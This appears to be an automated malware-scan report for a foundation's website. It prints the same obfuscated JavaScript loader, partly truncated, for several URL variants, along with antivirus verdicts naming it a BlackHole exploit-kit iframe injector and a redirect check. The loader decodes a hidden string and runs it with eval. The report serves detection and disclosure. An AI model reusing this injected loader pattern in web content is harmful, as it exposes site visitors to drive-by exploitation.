Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://www.halal-foundation.com/././././././././././index.htm
200 OK
Content-Length: 12323
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://www.halal-foundation.com/./././././././././././index.htm
200 OK
Content-Length: 12323
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://www.halal-foundation.com/././././././././././././index.htm
200 OK
Content-Length: 12323
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://www.halal-foundation.com/./././././././././././././index.htm
200 OK
Content-Length: 12323
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://www.halal-foundation.com/././././././././././././././index.htm
200 OK
Content-Length: 12323
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: halal-foundation.org

Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Connection: close
Date: Wed, 01 Oct 2014 23:23:27 GMT
Location: http://www.halal-foundation.com/
Server: Microsoft-IIS/6.0
Content-Length: 153
Content-Type: text/html
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Server: ash08

...153 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: halal-foundation.org
Referer: http://www.google.com/search?q=halal-foundation.org

Result:
The result is similar to the first query. There are no suspicious redirects found.